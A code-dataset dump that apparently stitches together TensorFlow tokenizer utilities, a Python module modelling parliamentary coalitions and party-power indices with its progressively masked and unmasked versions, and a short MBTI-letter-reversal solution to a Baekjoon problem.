\"\"\"Very basic tokenizer: split the sentence into a list of tokens.\"\"\"\n words = []\n for space_separated_fragment in sentence.strip().split():\n words.extend(_WORD_SPLIT.split(space_separated_fragment))\n return [w for w in words if w]\n\n\ndef create_vocabulary(vocabulary_path, json_vocab_path):\n \"\"\"Create vocabulary file (if it does not exist yet) from data file.\n\n Data file is assumed to contain one sentence per line. Each sentence is\n tokenized and digits are normalized (if normalize_digits is set).\n Vocabulary contains the most-frequent tokens up to max_vocabulary_size.\n We write it to vocabulary_path in a one-token-per-line format, so that later\n token in the first line gets id=0, second line gets id=1, and so on.\n\n Args:\n vocabulary_path: path where the vocabulary will be created.\n json_vocab_path: data file that will be used to create vocabulary.\n \"\"\"\n if not gfile.Exists(vocabulary_path):\n print(\"Transform vocabulary to %s\" % vocabulary_path)\n with gfile.GFile(json_vocab_path, mode=\"rb\") as f:\n jvocab = json.load(f)\n vocab = jvocab['w2id']\n vocab_list = _START_VOCAB + sorted(vocab, key=vocab.get)\n with gfile.GFile(vocabulary_path, mode=\"wb\") as vocab_file:\n for w in vocab_list:\n vocab_file.write(w + b\"\\n\")\n\n\ndef initialize_vocabulary(vocabulary_path):\n \"\"\"Initialize vocabulary from file.\n\n We assume the vocabulary is stored one-item-per-line, so a file:\n dog\n cat\n will result in a vocabulary {\"dog\": 0, \"cat\": 1}, and this function will\n also return the reversed-vocabulary [\"dog\", \"cat\"].\n\n Args:\n vocabulary_path: path to the file containing the vocabulary.\n\n Returns:\n a pair: the vocabulary (a dictionary mapping string to integers), and\n the reversed vocabulary (a list, which reverses the vocabulary mapping).\n\n Raises:\n ValueError: if the provided vocabulary_path does not exist.\n \"\"\"\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode=\"rb\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)\n\n\ndef sentence_to_token_ids(sentence, vocabulary):\n \"\"\"Convert a string to list of integers representing token-ids.\n\n For example, a sentence \"I have a dog\" may become tokenized into\n [\"I\", \"have\", \"a\", \"dog\"] and with vocabulary {\"I\": 1, \"have\": 2,\n \"a\": 4, \"dog\": 7\"} this function will return [1, 2, 4, 7].\n\n Args:\n sentence: the sentence in bytes format to convert to token-ids.\n vocabulary: a dictionary mapping tokens to integers.\n\n Returns:\n a list of integers, the token-ids for the sentence.\n \"\"\"\n return [vocabulary.get(w, UNK_ID) for w in sentence.strip().split()]\n\n\ndef data_to_token_ids(data_path, target_path, vocabulary_path):\n \"\"\"Tokenize data file and turn into token-ids using given vocabulary file.\n\n This function loads data line-by-line from data_path, calls the above\n sentence_to_token_ids, and saves the result to target_path. See comment\n for sentence_to_token_ids on the details of token-ids format.\n\n Args:\n data_path: path to the data file in one-sentence-per-line format.\n target_path: path where the file with token-ids will be created.\n vocabulary_path: path to the vocabulary file.\n \"\"\"\n if not gfile.Exists(target_path):\n print(\"Tokenizing data in %s\" % data_path)\n vocab, _ = initialize_vocabulary(vocabulary_path)\n with gfile.GFile(data_path, mode=\"rb\") as data_file:\n with gfile.GFile(target_path, mode=\"w\") as tokens_file:\n counter = 0\n for line in data_file:\n counter += 1\n if counter % 100000 == 0:\n print(\" tokenizing line %d\" % counter)\n token_ids = sentence_to_token_ids(tf.compat.as_bytes(line), vocab)\n tokens_file.write(\" \".join([str(tok) for tok in token_ids]) + \"\\n\")\n\n\ndef prepare_jsonlbpe_data(data_dir, train_data_file, dev_data_file, vocab_file):\n \"\"\"Get WMT data into data_dir, create vocabularies and tokenize data.\n\n Args:\n data_dir: directory in which the data sets will be stored.\n train_data_file: jsonl data file.\n dev_data_file: jsonl data file.\n vocab_file: bpe json vocab\n\n Returns:\n A tuple of 6 elements:\n (1) path to the token-ids for src training data-set,\n (2) path to the token-ids for target training data-set,\n (3) path to the token-ids for src development data-set,\n (4) path to the token-ids for src development data-set,\n (5) path to the src vocabulary file,\n (6) path to the src vocabulary file.\n \"\"\"\n if not gfile.Exists(data_dir):\n gfile.MkDir(data_dir)\n\n # Get wmt data to the specified directory.\n train_path = get_qa_set(data_dir, train_data_file)\n dev_path = get_qa_set(data_dir, dev_data_file)\n\n # Create vocabularies of the appropriate sizes.\n vocab_path = os.path.join(data_dir, \"vocab.txt\")\n create_vocabulary(vocab_path, vocab_file)\n\n # Create token ids for the training data.\n src_train_ids_path = train_path + \".src.ids\"\n targ_train_ids_path = train_path + \".targ.ids\"\n data_to_token_ids(train_path + \".src\", src_train_ids_path, vocab_path)\n data_to_token_ids(train_path + \".targ\", targ_train_ids_path, vocab_path)\n\n # Create token ids for the development data.\n src_dev_ids_path = dev_path + \".src.ids\"\n targ_dev_ids_path = dev_path + \".targ.ids\"\n data_to_token_ids(dev_path + \".src\", src_dev_ids_path, vocab_path)\n data_to_token_ids(dev_path + \".targ\", targ_dev_ids_path, vocab_path)\n\n return (src_train_ids_path, targ_train_ids_path,\n src_dev_ids_path, targ_dev_ids_path,\n vocab_path)\n", "step-ids": [ 2, 3, 7, 8, 10 ] }
[ 2, 3, 7, 8, 10 ]
import collections import itertools from . import stats __all__ = [ 'Party', 'HoR', 'Coalition' ] Party = collections.namedtuple('Party', 'name,votes,seats') class HoR(object): """House of Representatives""" def __init__(self, parties, name='HoR'): self.name = name self._parties = tuple(sorted(parties, key=lambda p: (p.seats, p.votes), reverse=True)) self._party_mapping = {p.name: p for p in self._parties} def __getitem__(self, item): return self._party_mapping[item] @property def parties(self): return self._parties def seats_list(self): return [p.seats for p in self._parties] def votes_list(self): return [p.votes for p in self._parties] def names_list(self): return [p.name for p in self._parties] def vote_shares_list(self): v = self.votes return [vi / v for vi in self.votes_list()] def seat_shares_list(self): s = self.seats return [si / s for si in self.seats_list()] @property def seats(self): return sum(self.seats_list()) @property def votes(self): return sum(self.votes_list()) def top(self, n=1): return Coalition(self, self._parties[:n]) def as_coalition(self): return Coalition(self, self._parties) def __contains__(self, item): return item in self._parties def __iter__(self): return iter(self._parties) def iter_coalitions(self): for n in range(1, len(self)): for coalition in itertools.combinations(self._parties, n): yield Coalition(self, coalition) def __len__(self): return len(self._parties) def __hash__(self): return hash(self._parties) def same_as(self, hor): return self.parties == hor.parties def __eq__(self, other): return self.seats == other.seats def __gt__(self, other): return self.seats > other.seats def __ge__(self, other): return self.seats >= other.seats def __le__(self, other): return self.seats <= other.seats def __lt__(self, other): return self.seats < other.seats haar = stats.haar dev = stats.dev ens = stats.ens env = stats.env rrp = stats.rrp bantsaf_influence = stats.bantsaf_influence shepli_shubic = stats.shepli_shubic jonson_general = stats.jonson_general jonson_influence = stats.jonson_influence digen_pakel_general = stats.digen_pakel_general digen_pakel_influence = stats.digen_pakel_influence holer_pakel = stats.holer_pakel describe = stats.describe def map_stat(self, stat): if stat in ('seats', 'votes'): return {party.name: getattr(party, stat) for party in self._parties} elif stat in ( stats.bantsaf_influence, stats.shepli_shubic, stats.jonson_general, stats.jonson_influence, stats.digen_pakel_general, stats.digen_pakel_influence, stats.holer_pakel, ): return {party.name: stat(self, party) for party in self._parties} elif stat not in ( 'bantsaf_influence', 'shepli_shubic', 'jonson_general', 'jonson_influence', 'digen_pakel_general', 'digen_pakel_influence', 'holer_pakel', ): raise ValueError('Stat {} cannot be computed'.format(stat)) return {party.name: getattr(self, stat)(party) for party in self._parties} class Coalition(HoR): def __init__(self, hor, parties, name='Coalition', *, _opposition=None): super().__init__(parties, name=name) self._hor = hor self._opposition = _opposition @property def opposition(self): if self._opposition is None: others = [p for p in self._hor if p not in self] self._opposition = Coalition(self._hor, others, _opposition=self) return self._opposition @property def hor(self): return self._hor def __add__(self, other): if isinstance(other, Party): if other in self: raise ValueError('{} is already present in HoR'.format(other)) new = self._parties + (other, ) elif isinstance(other, Coalition) and other.hor.same_as(self.hor): intercept = set(other) & set(self._parties) if intercept: raise ValueError('{} are already present in HoR'.format(intercept)) new = self._parties + tuple(other) else: raise TypeError('Wrong type for {}'.format(other)) return self.__class__(self.hor, new) def __sub__(self, other): if isinstance(other, Party): if other not in self: raise ValueError('{} is not present in HoR'.format(other)) new = set(self._parties) - {other} elif isinstance(other, Coalition) and other.hor.same_as(self.hor): intercept = set(other) & set(self._parties) if not intercept: raise ValueError('{} are not present in HoR'.format(intercept)) new = set(self._parties) - set(other.parties) else: raise TypeError('Wrong type for {}'.format(other)) return self.__class__(self.hor, new) def has_key_party(self, party): if party not in self: return False else: opposition = self.opposition return ( (self > opposition) and ((self - party) <= (opposition + party)) ) def key_parties(self): return list(filter(self.has_key_party, self.parties)) def is_minimum_winning(self): return all(map(self.has_key_party, self.parties))
normal
{ "blob_id": "4c927f14065d0557dbe7b371002e133c351d3478", "index": 6933, "step-1": "<mask token>\n\n\nclass HoR(object):\n <mask token>\n\n def __init__(self, parties, name='HoR'):\n self.name = name\n self._parties = tuple(sorted(parties, key=lambda p: (p.seats, p.\n votes), reverse=True))\n self._party_mapping = {p.name: p for p in self._parties}\n\n def __getitem__(self, item):\n return self._party_mapping[item]\n\n @property\n def parties(self):\n return self._parties\n\n def seats_list(self):\n return [p.seats for p in self._parties]\n\n def votes_list(self):\n return [p.votes for p in self._parties]\n\n def names_list(self):\n return [p.name for p in self._parties]\n\n def vote_shares_list(self):\n v = self.votes\n return [(vi / v) for vi in self.votes_list()]\n\n def seat_shares_list(self):\n s = self.seats\n return [(si / s) for si in self.seats_list()]\n\n @property\n def seats(self):\n return sum(self.seats_list())\n <mask token>\n\n def top(self, n=1):\n return Coalition(self, self._parties[:n])\n\n def as_coalition(self):\n return Coalition(self, self._parties)\n\n def __contains__(self, item):\n return item in self._parties\n\n def __iter__(self):\n return iter(self._parties)\n\n def iter_coalitions(self):\n for n in range(1, len(self)):\n for coalition in itertools.combinations(self._parties, n):\n yield Coalition(self, coalition)\n\n def __len__(self):\n return len(self._parties)\n <mask token>\n\n def same_as(self, hor):\n return self.parties == hor.parties\n\n def __eq__(self, other):\n return self.seats == other.seats\n\n def __gt__(self, other):\n return self.seats > other.seats\n\n def __ge__(self, other):\n return self.seats >= other.seats\n\n def __le__(self, other):\n return self.seats <= other.seats\n\n def __lt__(self, other):\n return self.seats < other.seats\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Coalition(HoR):\n\n def __init__(self, hor, parties, name='Coalition', *, _opposition=None):\n super().__init__(parties, name=name)\n self._hor = hor\n self._opposition = _opposition\n\n @property\n def opposition(self):\n if self._opposition is None:\n others = [p for p in self._hor if p not in self]\n self._opposition = Coalition(self._hor, others, _opposition=self)\n return self._opposition\n\n @property\n def hor(self):\n return self._hor\n\n def __add__(self, other):\n if isinstance(other, Party):\n if other in self:\n raise ValueError('{} is already present in HoR'.format(other))\n new = self._parties + (other,)\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if intercept:\n raise ValueError('{} are already present in HoR'.format(\n intercept))\n new = self._parties + tuple(other)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def __sub__(self, other):\n if isinstance(other, Party):\n if other not in self:\n raise ValueError('{} is not present in HoR'.format(other))\n new = set(self._parties) - {other}\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if not intercept:\n raise ValueError('{} are not present in HoR'.format(intercept))\n new = set(self._parties) - set(other.parties)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def has_key_party(self, party):\n if party not in self:\n return False\n else:\n opposition = self.opposition\n return self > opposition and self - party <= opposition + party\n\n def key_parties(self):\n return list(filter(self.has_key_party, self.parties))\n\n def is_minimum_winning(self):\n return all(map(self.has_key_party, self.parties))\n", "step-2": "<mask token>\n\n\nclass HoR(object):\n <mask token>\n\n def __init__(self, parties, name='HoR'):\n self.name = name\n self._parties = tuple(sorted(parties, key=lambda p: (p.seats, p.\n votes), reverse=True))\n self._party_mapping = {p.name: p for p in self._parties}\n\n def __getitem__(self, item):\n return self._party_mapping[item]\n\n @property\n def parties(self):\n return self._parties\n\n def seats_list(self):\n return [p.seats for p in self._parties]\n\n def votes_list(self):\n return [p.votes for p in self._parties]\n\n def names_list(self):\n return [p.name for p in self._parties]\n\n def vote_shares_list(self):\n v = self.votes\n return [(vi / v) for vi in self.votes_list()]\n\n def seat_shares_list(self):\n s = self.seats\n return [(si / s) for si in self.seats_list()]\n\n @property\n def seats(self):\n return sum(self.seats_list())\n <mask token>\n\n def top(self, n=1):\n return Coalition(self, self._parties[:n])\n\n def as_coalition(self):\n return Coalition(self, self._parties)\n\n def __contains__(self, item):\n return item in self._parties\n\n def __iter__(self):\n return iter(self._parties)\n\n def iter_coalitions(self):\n for n in range(1, len(self)):\n for coalition in itertools.combinations(self._parties, n):\n yield Coalition(self, coalition)\n\n def __len__(self):\n return len(self._parties)\n\n def __hash__(self):\n return hash(self._parties)\n\n def same_as(self, hor):\n return self.parties == hor.parties\n\n def __eq__(self, other):\n return self.seats == other.seats\n\n def __gt__(self, other):\n return self.seats > other.seats\n\n def __ge__(self, other):\n return self.seats >= other.seats\n\n def __le__(self, other):\n return self.seats <= other.seats\n\n def __lt__(self, other):\n return self.seats < other.seats\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Coalition(HoR):\n\n def __init__(self, hor, parties, name='Coalition', *, _opposition=None):\n super().__init__(parties, name=name)\n self._hor = hor\n self._opposition = _opposition\n\n @property\n def opposition(self):\n if self._opposition is None:\n others = [p for p in self._hor if p not in self]\n self._opposition = Coalition(self._hor, others, _opposition=self)\n return self._opposition\n\n @property\n def hor(self):\n return self._hor\n\n def __add__(self, other):\n if isinstance(other, Party):\n if other in self:\n raise ValueError('{} is already present in HoR'.format(other))\n new = self._parties + (other,)\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if intercept:\n raise ValueError('{} are already present in HoR'.format(\n intercept))\n new = self._parties + tuple(other)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def __sub__(self, other):\n if isinstance(other, Party):\n if other not in self:\n raise ValueError('{} is not present in HoR'.format(other))\n new = set(self._parties) - {other}\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if not intercept:\n raise ValueError('{} are not present in HoR'.format(intercept))\n new = set(self._parties) - set(other.parties)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def has_key_party(self, party):\n if party not in self:\n return False\n else:\n opposition = self.opposition\n return self > opposition and self - party <= opposition + party\n\n def key_parties(self):\n return list(filter(self.has_key_party, self.parties))\n\n def is_minimum_winning(self):\n return all(map(self.has_key_party, self.parties))\n", "step-3": "<mask token>\n\n\nclass HoR(object):\n <mask token>\n\n def __init__(self, parties, name='HoR'):\n self.name = name\n self._parties = tuple(sorted(parties, key=lambda p: (p.seats, p.\n votes), reverse=True))\n self._party_mapping = {p.name: p for p in self._parties}\n\n def __getitem__(self, item):\n return self._party_mapping[item]\n\n @property\n def parties(self):\n return self._parties\n\n def seats_list(self):\n return [p.seats for p in self._parties]\n\n def votes_list(self):\n return [p.votes for p in self._parties]\n\n def names_list(self):\n return [p.name for p in self._parties]\n\n def vote_shares_list(self):\n v = self.votes\n return [(vi / v) for vi in self.votes_list()]\n\n def seat_shares_list(self):\n s = self.seats\n return [(si / s) for si in self.seats_list()]\n\n @property\n def seats(self):\n return sum(self.seats_list())\n\n @property\n def votes(self):\n return sum(self.votes_list())\n\n def top(self, n=1):\n return Coalition(self, self._parties[:n])\n\n def as_coalition(self):\n return Coalition(self, self._parties)\n\n def __contains__(self, item):\n return item in self._parties\n\n def __iter__(self):\n return iter(self._parties)\n\n def iter_coalitions(self):\n for n in range(1, len(self)):\n for coalition in itertools.combinations(self._parties, n):\n yield Coalition(self, coalition)\n\n def __len__(self):\n return len(self._parties)\n\n def __hash__(self):\n return hash(self._parties)\n\n def same_as(self, hor):\n return self.parties == hor.parties\n\n def __eq__(self, other):\n return self.seats == other.seats\n\n def __gt__(self, other):\n return self.seats > other.seats\n\n def __ge__(self, other):\n return self.seats >= other.seats\n\n def __le__(self, other):\n return self.seats <= other.seats\n\n def __lt__(self, other):\n return self.seats < other.seats\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def map_stat(self, stat):\n if stat in ('seats', 'votes'):\n return {party.name: getattr(party, stat) for party in self._parties\n }\n elif stat in (stats.bantsaf_influence, stats.shepli_shubic, stats.\n jonson_general, stats.jonson_influence, stats.\n digen_pakel_general, stats.digen_pakel_influence, stats.holer_pakel\n ):\n return {party.name: stat(self, party) for party in self._parties}\n elif stat not in ('bantsaf_influence', 'shepli_shubic',\n 'jonson_general', 'jonson_influence', 'digen_pakel_general',\n 'digen_pakel_influence', 'holer_pakel'):\n raise ValueError('Stat {} cannot be computed'.format(stat))\n return {party.name: getattr(self, stat)(party) for party in self.\n _parties}\n\n\nclass Coalition(HoR):\n\n def __init__(self, hor, parties, name='Coalition', *, _opposition=None):\n super().__init__(parties, name=name)\n self._hor = hor\n self._opposition = _opposition\n\n @property\n def opposition(self):\n if self._opposition is None:\n others = [p for p in self._hor if p not in self]\n self._opposition = Coalition(self._hor, others, _opposition=self)\n return self._opposition\n\n @property\n def hor(self):\n return self._hor\n\n def __add__(self, other):\n if isinstance(other, Party):\n if other in self:\n raise ValueError('{} is already present in HoR'.format(other))\n new = self._parties + (other,)\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if intercept:\n raise ValueError('{} are already present in HoR'.format(\n intercept))\n new = self._parties + tuple(other)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def __sub__(self, other):\n if isinstance(other, Party):\n if other not in self:\n raise ValueError('{} is not present in HoR'.format(other))\n new = set(self._parties) - {other}\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if not intercept:\n raise ValueError('{} are not present in HoR'.format(intercept))\n new = set(self._parties) - set(other.parties)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def has_key_party(self, party):\n if party not in self:\n return False\n else:\n opposition = self.opposition\n return self > opposition and self - party <= opposition + party\n\n def key_parties(self):\n return list(filter(self.has_key_party, self.parties))\n\n def is_minimum_winning(self):\n return all(map(self.has_key_party, self.parties))\n", "step-4": "<mask token>\n\n\nclass HoR(object):\n \"\"\"House of Representatives\"\"\"\n\n def __init__(self, parties, name='HoR'):\n self.name = name\n self._parties = tuple(sorted(parties, key=lambda p: (p.seats, p.\n votes), reverse=True))\n self._party_mapping = {p.name: p for p in self._parties}\n\n def __getitem__(self, item):\n return self._party_mapping[item]\n\n @property\n def parties(self):\n return self._parties\n\n def seats_list(self):\n return [p.seats for p in self._parties]\n\n def votes_list(self):\n return [p.votes for p in self._parties]\n\n def names_list(self):\n return [p.name for p in self._parties]\n\n def vote_shares_list(self):\n v = self.votes\n return [(vi / v) for vi in self.votes_list()]\n\n def seat_shares_list(self):\n s = self.seats\n return [(si / s) for si in self.seats_list()]\n\n @property\n def seats(self):\n return sum(self.seats_list())\n\n @property\n def votes(self):\n return sum(self.votes_list())\n\n def top(self, n=1):\n return Coalition(self, self._parties[:n])\n\n def as_coalition(self):\n return Coalition(self, self._parties)\n\n def __contains__(self, item):\n return item in self._parties\n\n def __iter__(self):\n return iter(self._parties)\n\n def iter_coalitions(self):\n for n in range(1, len(self)):\n for coalition in itertools.combinations(self._parties, n):\n yield Coalition(self, coalition)\n\n def __len__(self):\n return len(self._parties)\n\n def __hash__(self):\n return hash(self._parties)\n\n def same_as(self, hor):\n return self.parties == hor.parties\n\n def __eq__(self, other):\n return self.seats == other.seats\n\n def __gt__(self, other):\n return self.seats > other.seats\n\n def __ge__(self, other):\n return self.seats >= other.seats\n\n def __le__(self, other):\n return self.seats <= other.seats\n\n def __lt__(self, other):\n return self.seats < other.seats\n haar = stats.haar\n dev = stats.dev\n ens = stats.ens\n env = stats.env\n rrp = stats.rrp\n bantsaf_influence = stats.bantsaf_influence\n shepli_shubic = stats.shepli_shubic\n jonson_general = stats.jonson_general\n jonson_influence = stats.jonson_influence\n digen_pakel_general = stats.digen_pakel_general\n digen_pakel_influence = stats.digen_pakel_influence\n holer_pakel = stats.holer_pakel\n describe = stats.describe\n\n def map_stat(self, stat):\n if stat in ('seats', 'votes'):\n return {party.name: getattr(party, stat) for party in self._parties\n }\n elif stat in (stats.bantsaf_influence, stats.shepli_shubic, stats.\n jonson_general, stats.jonson_influence, stats.\n digen_pakel_general, stats.digen_pakel_influence, stats.holer_pakel\n ):\n return {party.name: stat(self, party) for party in self._parties}\n elif stat not in ('bantsaf_influence', 'shepli_shubic',\n 'jonson_general', 'jonson_influence', 'digen_pakel_general',\n 'digen_pakel_influence', 'holer_pakel'):\n raise ValueError('Stat {} cannot be computed'.format(stat))\n return {party.name: getattr(self, stat)(party) for party in self.\n _parties}\n\n\nclass Coalition(HoR):\n\n def __init__(self, hor, parties, name='Coalition', *, _opposition=None):\n super().__init__(parties, name=name)\n self._hor = hor\n self._opposition = _opposition\n\n @property\n def opposition(self):\n if self._opposition is None:\n others = [p for p in self._hor if p not in self]\n self._opposition = Coalition(self._hor, others, _opposition=self)\n return self._opposition\n\n @property\n def hor(self):\n return self._hor\n\n def __add__(self, other):\n if isinstance(other, Party):\n if other in self:\n raise ValueError('{} is already present in HoR'.format(other))\n new = self._parties + (other,)\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if intercept:\n raise ValueError('{} are already present in HoR'.format(\n intercept))\n new = self._parties + tuple(other)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def __sub__(self, other):\n if isinstance(other, Party):\n if other not in self:\n raise ValueError('{} is not present in HoR'.format(other))\n new = set(self._parties) - {other}\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if not intercept:\n raise ValueError('{} are not present in HoR'.format(intercept))\n new = set(self._parties) - set(other.parties)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def has_key_party(self, party):\n if party not in self:\n return False\n else:\n opposition = self.opposition\n return self > opposition and self - party <= opposition + party\n\n def key_parties(self):\n return list(filter(self.has_key_party, self.parties))\n\n def is_minimum_winning(self):\n return all(map(self.has_key_party, self.parties))\n", "step-5": "import collections\nimport itertools\nfrom . import stats\n\n__all__ = [\n 'Party',\n 'HoR',\n 'Coalition'\n]\n\nParty = collections.namedtuple('Party', 'name,votes,seats')\n\n\nclass HoR(object):\n \"\"\"House of Representatives\"\"\"\n\n def __init__(self, parties, name='HoR'):\n self.name = name\n self._parties = tuple(sorted(parties, key=lambda p: (p.seats, p.votes), reverse=True))\n self._party_mapping = {p.name: p for p in self._parties}\n\n def __getitem__(self, item):\n return self._party_mapping[item]\n\n @property\n def parties(self):\n return self._parties\n\n def seats_list(self):\n return [p.seats for p in self._parties]\n\n def votes_list(self):\n return [p.votes for p in self._parties]\n\n def names_list(self):\n return [p.name for p in self._parties]\n\n def vote_shares_list(self):\n v = self.votes\n return [vi / v for vi in self.votes_list()]\n\n def seat_shares_list(self):\n s = self.seats\n return [si / s for si in self.seats_list()]\n\n @property\n def seats(self):\n return sum(self.seats_list())\n\n @property\n def votes(self):\n return sum(self.votes_list())\n\n def top(self, n=1):\n return Coalition(self, self._parties[:n])\n\n def as_coalition(self):\n return Coalition(self, self._parties)\n\n def __contains__(self, item):\n return item in self._parties\n\n def __iter__(self):\n return iter(self._parties)\n\n def iter_coalitions(self):\n for n in range(1, len(self)):\n for coalition in itertools.combinations(self._parties, n):\n yield Coalition(self, coalition)\n\n def __len__(self):\n return len(self._parties)\n\n def __hash__(self):\n return hash(self._parties)\n\n def same_as(self, hor):\n return self.parties == hor.parties\n\n def __eq__(self, other):\n return self.seats == other.seats\n\n def __gt__(self, other):\n return self.seats > other.seats\n\n def __ge__(self, other):\n return self.seats >= other.seats\n\n def __le__(self, other):\n return self.seats <= other.seats\n\n def __lt__(self, other):\n return self.seats < other.seats\n\n haar = stats.haar\n dev = stats.dev\n ens = stats.ens\n env = stats.env\n rrp = stats.rrp\n bantsaf_influence = stats.bantsaf_influence\n shepli_shubic = stats.shepli_shubic\n jonson_general = stats.jonson_general\n jonson_influence = stats.jonson_influence\n digen_pakel_general = stats.digen_pakel_general\n digen_pakel_influence = stats.digen_pakel_influence\n holer_pakel = stats.holer_pakel\n describe = stats.describe\n\n def map_stat(self, stat):\n if stat in ('seats', 'votes'):\n return {party.name: getattr(party, stat)\n for party in self._parties}\n elif stat in (\n stats.bantsaf_influence,\n stats.shepli_shubic,\n stats.jonson_general,\n stats.jonson_influence,\n stats.digen_pakel_general,\n stats.digen_pakel_influence,\n stats.holer_pakel,\n ):\n return {party.name: stat(self, party)\n for party in self._parties}\n elif stat not in (\n 'bantsaf_influence',\n 'shepli_shubic',\n 'jonson_general',\n 'jonson_influence',\n 'digen_pakel_general',\n 'digen_pakel_influence',\n 'holer_pakel',\n ):\n raise ValueError('Stat {} cannot be computed'.format(stat))\n return {party.name: getattr(self, stat)(party)\n for party in self._parties}\n\n\nclass Coalition(HoR):\n def __init__(self, hor, parties, name='Coalition', *, _opposition=None):\n super().__init__(parties, name=name)\n self._hor = hor\n self._opposition = _opposition\n\n @property\n def opposition(self):\n if self._opposition is None:\n others = [p for p in self._hor if p not in self]\n self._opposition = Coalition(self._hor, others, _opposition=self)\n return self._opposition\n\n @property\n def hor(self):\n return self._hor\n\n def __add__(self, other):\n if isinstance(other, Party):\n if other in self:\n raise ValueError('{} is already present in HoR'.format(other))\n new = self._parties + (other, )\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if intercept:\n raise ValueError('{} are already present in HoR'.format(intercept))\n new = self._parties + tuple(other)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def __sub__(self, other):\n if isinstance(other, Party):\n if other not in self:\n raise ValueError('{} is not present in HoR'.format(other))\n new = set(self._parties) - {other}\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if not intercept:\n raise ValueError('{} are not present in HoR'.format(intercept))\n new = set(self._parties) - set(other.parties)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def has_key_party(self, party):\n if party not in self:\n return False\n else:\n opposition = self.opposition\n return (\n (self > opposition)\n and\n ((self - party) <= (opposition + party))\n )\n\n def key_parties(self):\n return list(filter(self.has_key_party, self.parties))\n\n def is_minimum_winning(self):\n return all(map(self.has_key_party, self.parties))\n\n", "step-ids": [ 31, 32, 34, 36, 39 ] }
[ 31, 32, 34, 36, 39 ]
# https://www.acmicpc.net/problem/20540 # 각 지표의 반대되는 지표를 저장한 dictionary MBTI_reverse_index = { 'E': 'I', 'I': 'E', 'S': 'N', 'N': 'S', 'T': 'F', 'F': 'T', 'J': 'P', 'P': 'J' } # 연길이의 MBTI 4글자를 대문자로 입력 yeongil_MBTI = input() # 연길이 MBTI의 각 지표에 반대되는 지표를 출력 for i in yeongil_MBTI: print(MBTI_reverse_index[i], end='')
normal
{ "blob_id": "c247b218267fc7c2bee93053dd90b2806572eaf2", "index": 4234, "step-1": "<mask token>\n", "step-2": "<mask token>\nfor i in yeongil_MBTI:\n print(MBTI_reverse_index[i], end='')\n", "step-3": "MBTI_reverse_index = {'E': 'I', 'I': 'E', 'S': 'N', 'N': 'S', 'T': 'F', 'F':\n 'T', 'J': 'P', 'P': 'J'}\nyeongil_MBTI = input()\nfor i in yeongil_MBTI:\n print(MBTI_reverse_index[i], end='')\n", "step-4": "# https://www.acmicpc.net/problem/20540\n\n# 각 지표의 반대되는 지표를 저장한 dictionary\nMBTI_reverse_index = {\n 'E': 'I',\n 'I': 'E',\n 'S': 'N',\n 'N': 'S',\n 'T': 'F',\n 'F': 'T',\n 'J': 'P',\n 'P': 'J'\n}\n\n# 연길이의 MBTI 4글자를 대문자로 입력\nyeongil_MBTI = input()\n\n# 연길이 MBTI의 각 지표에 반대되는 지표를 출력\nfor i in yeongil_MBTI:\n print(MBTI_reverse_index[i], end='')", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
